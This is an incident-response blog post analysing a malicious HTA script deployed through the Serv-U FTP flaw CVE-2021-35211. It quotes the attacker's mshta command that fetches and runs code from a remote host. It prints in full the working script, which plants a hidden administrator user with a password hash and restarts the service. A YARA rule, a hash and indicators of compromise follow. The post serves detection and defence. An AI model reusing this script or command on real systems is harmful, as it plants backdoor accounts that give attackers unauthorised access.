Cloud Incident Response Blog | Cado Security

Triage analysis of Serv-U FTP user backdoor deployed by CVE-2021-35211

Written by Chris Doman | Jul 14, 2021 7:07:04 PM

Last night, Microsoft published a blog titled Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit:

“MSTIC has observed DEV-0322 targeting entities in the US Defense Industrial Base Sector and software companies .... This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”

One of the malicious commands the attacker ran that Microsoft shared is:

<span class="vkIF2 public-DraftStyleDefault-ltr"><span class="">C:</span>WindowsSystem32mshta<span class="_3YD8l">.</span>exe http<span class="_3YD8l">://144[.]34[.]179[.]162/</span>a </span>

We took a very quick look at the file 8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0 - served from http://144.34.179[.] 162/a - below.

The server is down now, but was previously serving over port 80 from an Apache web-server set to the Chinese language:

HTTP/1.1 403 Forbidden
Date: Sat, 26 Jun 2021 13:48:06 GMT
Server: Apache/2.4.37 (centos)
Content-Location: index.html.zh-CN
Vary: negotiate,accept-language
TCN: choice
Last-Modified: Fri, 14 Jun 2019 03:37:43 GMT
ETag: "fa6-58b405e7d6fc0;5c336bc7f4d1f"
Accept-Ranges: bytes
Content-Length: 4006
Content-Type: text/html; charset=UTF-8
Content-Language: zh-cn

And the script served is a relatively simple one:

<html>
<head>
<script>
try {
var sFolderPath = "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users";
var fso0 = new ActiveXObject('Scripting.FileSystemObject');
if (!fso0.FolderExists(sFolderPath)) {
fso0.CreateFolder(sFolderPath);
}
var fso;
var data = ">>> VERSION 2 <<<\r\nCUser\r\nUser\r\n0\r\n0\r\n14\r\nCRhinoDateTimeAttr\r\nStatisticsStartTime\r\n1\r\n1\r\nVal\r\n1622098423\r\n<<- StatisticsStartTime\r\nCRhinoUlongLongAttr\r\nRtServerStartTime\r\n1\r\n1\r\nVal\r\n1622075299\r\n<<- RtServerStartTime\r\nCDailyCount\r\nRtDailyCount\r\n1\r\n0\r\n25\r\nCRhinoUintAttr\r\nLastHour\r\n1\r\n1\r\nVal\r\n6\r\n<<- LastHour\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\n<<- RtDailyCount\r\nCRhinoFileNameStringAttr\r\nLoginID\r\n1\r\n1\r\nVal\r\ntory\r\n<<- LoginID\r\nCRhinoDateTimeAttr\r\nPasswordChangedOn\r\n1\r\n1\r\nVal\r\n1622098423\r\n<<- PasswordChangedOn\r\nCRhinoUintAttr\r\nPasswordEncryptMode\r\n1\r\n1\r\nVal\r\n1\r\n<<- PasswordEncryptMode\r\nCRhinoBoolAttr\r\nPasswordUTF8\r\n1\r\n1\r\nVal\r\n1\r\n<<- PasswordUTF8\r\nCUserPasswordAttr\r\nPassword\r\n1\r\n1\r\nVal\r\n00:DDAC510D6348F0D1CA9D169BF3835DCE1EC5A7AE344964F2DA753991D34C015DEB91B64437A9C99A2AE8EC3CD850694F\r\n<<- Password\r\nCDirAccess\r\nDirAccess\r\n0\r\n0\r\n2\r\nCDirFileAccessPathAttr\r\nDir\r\n1\r\n1\r\nVal\r\n\\\\\r\n<<- Dir\r\nCRhinoUintAttr\r\nAccess\r\n1\r\n1\r\nVal\r\n7999\r\n<<- Access\r\n<<- DirAccess\r\nCDirPathAttr\r\nHomeDir\r\n0\r\n1\r\nVal\r\n\\\\\r\n<<- HomeDir\r\nCRhinoUintAttr\r\nAdminType\r\n0\r\n1\r\nVal\r\n2\r\n<<- AdminType\r\nCRhinoBoolAttr\r\nLockInHomeDir\r\n0\r\n1\r\nVal\r\n0\r\n<<- LockInHomeDir\r\nCRhinoUlongLongAttr\r\nQuota\r\n0\r\n1\r\nVal\r\n0\r\n<<- Quota\r\nCRhinoBoolAttr\r\nIncludeRespCodesInMsgFiles\r\n0\r\n1\r\nVal\r\n1\r\n<<- IncludeRespCodesInMsgFiles\r\n<<- User\r\n";
fso=new ActiveXObject("Scripting.FileSystemObject");
var fhandle = fso.createtextfile("C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\tory.Archive",true);
fhandle.write(data);
fhandle.close()
} catch (e) {

}

var sleep = function(time) {
var startTime = new Date().getTime() + parseInt(time, 10);
while(new Date().getTime() < startTime) {}
};

s = new ActiveXObject("WScript.Shell");
s.run("\"C:\\Program Files\\RhinoSoft\\Serv-U\\Serv-U-Tray.exe\" -stopengine",0)
sleep(1000)
s.run("\"C:\\Program Files\\RhinoSoft\\Serv-U\\Serv-U.exe\" -startservice",0)
window.close();

</script>
</head>
</html>

The script is very simple- it just creates a new user with the following settings:

  • Set user creation date to: Thu May 27 2021 06:53:43 GMT+0000 (Unix timestamp of 1622098423)
  • Password Hash: DDAC510D6348F0D1CA9D169BF3835DCE1EC5A7AE344964F2DA753991D34C015DEB91B64437A9C99A2AE8EC3CD850694F

Based on the filename, we believe this user created is called “tory” however we haven’t tested this on a live Serv-U installation.

Yara Rule

rule Malware_ServU_User_Installer {
meta:
description = "Detects malicious script deployed via CVE-2021-35211"
author = "cdoman@cadosecurity.com"
date = "2021-07-14"
hash = "8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0"
license = "Apache License 2.0"
strings:
$ = "<script>"
$ = "Scripting.FileSystemObject"
$ = "Global Users"
$ = "RhinoDateTimeAttr"
$ = "Serv-U-Tray.exe"
$ = "WScript.Shell"

condition:
all of them and filesize < 300KB
}

File Hash
8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0

Indicators of Compromise (from Microsoft)
98[.]176[.]196[.]89
68[.]235[.]178[.]32
208[.]113[.]35[.]58
144[.]34[.]179[.]162
97[.]77[.]97[.]58
hxxp://144[.]34[.]179[.]162/a
C:\Windows\Temp\Serv-U.bat
C:\Windows\Temp\test\current.dmp

References

About Cado Security
Cado Security specialises in providing tooling and techniques that allow organisations to threat hunt and investigate cloud and container systems.

If you are interested in knowing more, please don’t hesitate to reach out, our pilot program is now open.